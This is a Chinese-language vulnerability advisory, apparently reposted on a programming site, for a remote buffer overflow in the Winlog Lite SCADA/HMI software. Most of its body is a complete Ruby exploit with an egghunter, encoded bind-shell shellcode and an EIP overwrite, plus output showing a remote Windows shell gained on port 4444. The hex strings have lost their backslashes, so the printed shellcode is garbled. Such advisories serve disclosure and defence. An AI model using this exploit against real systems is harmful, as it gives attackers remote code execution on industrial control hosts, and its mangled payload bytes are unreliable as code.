发布日期:2012-06-05
更新日期:2012-06-11受影响系统:
sielcosistemi SIELCO SISTEMI Winlog Lite 2.07.14
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53811Winlog Lite是Sielco Sistemi提供的入门级SCADA/HMI软件Winlog Pro,评估软件包的可能性和简单性,也是创建小型管理应用的解决方案。Winlog Lite在实现上存在远程缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码。<*来源:m1k3 (m1k3@s3cur1ty_de)
链接:http://www.securityfocus.com/archive/1/522974
http://www.linuxidc.com/Linux/2012-06/62642.htm
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!m1k3 ()提供了如下测试方法:# - Exploit:#root@bt:~/msf-scripts# ruby runtime-exploit-01.rb
#placing the shellcode
#sleeping ...
#kicking ...
#buffer length: 261
#root@bt:~/msf-scripts# netcat -v 10.8.28.37 4444
#10.8.28.37: inverse host lookup failed: Unknown server error : Connection timed out
#(UNKNOWN) [10.8.28.37] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:Documents and SettingsAll UsersApplication DataWinlog LiteProjectsCeramics KilnTemplate>
#
# Important:
# -> the reliability of your exploit depends on that path ...
# if you choose another default project or you start another project this path ist not reliable anymore
# you can choose the default project on the installation. I have used Ceramics Kilnrequire "socket"port = "46824"
host = "10.8.28.37"s = TCPSocket.open(host,port)sleep(0.5)egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
egghunter << "xefxb8x77x6fx6fx74x8bxfaxafx75xeaxafx75xe7xffxe7"#msfpayload windows/shell_bind_tcp R | msfencode -t ruby
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode =
"xdbxc8xd9x74x24xf4x5bxbax45x76x08xf1x33xc9" +
"xb1x56x31x53x18x83xebxfcx03x53x51x94xfdx0d" +
"xb1xd1xfexedx41x82x77x08x70x90xecx58x20x24" +
"x66x0cxc8xcfx2axa5x5bxbdxe2xcaxecx08xd5xe5" +
"xedxbcxd9xaax2dxdexa5xb0x61x00x97x7ax74x41" +
"xd0x67x76x13x89xecx24x84xbexb1xf4xa5x10xbe" +
"x44xdex15x01x30x54x17x52xe8xe3x5fx4ax83xac" +
"x7fx6bx40xafxbcx22xedx04x36xb5x27x55xb7x87" +
"x07x3ax86x27x8ax42xcex80x74x31x24xf3x09x42" +
"xffx89xd5xc7xe2x2ax9ex70xc7xcbx73xe6x8cxc0" +
"x38x6cxcaxc4xbfxa1x60xf0x34x44xa7x70x0ex63" +
"x63xd8xd5x0ax32x84xb8x33x24x60x65x96x2ex83" +
"x72xa0x6cxccxb7x9fx8ex0cxdfxa8xfdx3ex40x03" +
"x6ax73x09x8dx6dx74x20x69xe1x8bxcax8ax2bx48" +
"x9exdax43x79x9exb0x93x86x4bx16xc4x28x23xd7" +
"xb4x88x93xbfxdex06xccxa0xe0xccx7bxe7x2ex34" +
"x28x80x52xcaxdfx0cxdax2cxb5xbcx8axe7x21x7f" +
"xe9x3fxd6x80xdbx13x4fx17x53x7ax57x18x64xa8" +
"xf4xb5xccx3bx8exd5xc8x5ax91xf3x78x14xaax94" +
"xf3x48x79x04x03x41xe9xa5x96x0exe9xa0x8ax98" +
"xbexe5x7dxd1x2ax18x27x4bx48xe1xb1xb4xc8x3e" +
"x02x3axd1xb3x3ex18xc1x0dxbex24xb5xc1xe9xf2" +
"x63xa4x43xb5xddx7ex3fx1fx89x07x73xa0xcfx07" +
"x5ex56x2fxb9x37x2fx50x76xd0xa7x29x6ax40x47" +
"xe0x2ex70x02xa8x07x19xcbx39x1ax44xecx94x59" +
"x71x6fx1cx22x86x6fx55x27xc2x37x86x55x5bxd2" +
"xa8xcax5cxf7"puts "placing the shellcode"
buffer = "x41" * 2000
buffer << "wootwoot" #egg
buffer << "x90"
buffer << shellcode
buffer << "x90" * 2000
print "buffer length: #{buffer.length}
"
s.puts(buffer)puts "sleeping ..."
sleep(5)puts "kicking ..."
buffer = "x41" * 20 + "x14" * 10 + "x41" * 167
buffer << "xdfx53x51x40" #EIP -> Jmp ESP - Vclx40.bpl - 0x405153df
buffer << "x90"
buffer << egghunter
buffer << "x90" * (59 - egghunter.length)
print "buffer length: #{buffer.length}
"
s.puts(buffer)建议:
--------------------------------------------------------------------------------
厂商补丁:sielcosistemi
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.sielcosistemi.com/en/download/public/winlog_lite.htmlMySQL/MariaDB用户验证绕过漏洞Adobe Flash Player多个安全漏洞相关资讯 溢出漏洞
- 波音787发电机控制单元整数溢出漏 (05/04/2015 18:47:00)
- ALLMediaServer栈缓冲区溢出漏洞 (07/18/2012 09:36:26)
- IrfanView Formats PlugIn TTF文件 (06/05/2012 08:22:19)
| - Squashfs “unsquashfs”整数溢出 (07/24/2012 08:36:14)
- IrfanView Formats PlugIn "NCSEcw (06/06/2012 01:44:08)
- Network UPS Tools (NUT) "addchar (06/04/2012 08:05:11)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评
|
易网时代-编程资源站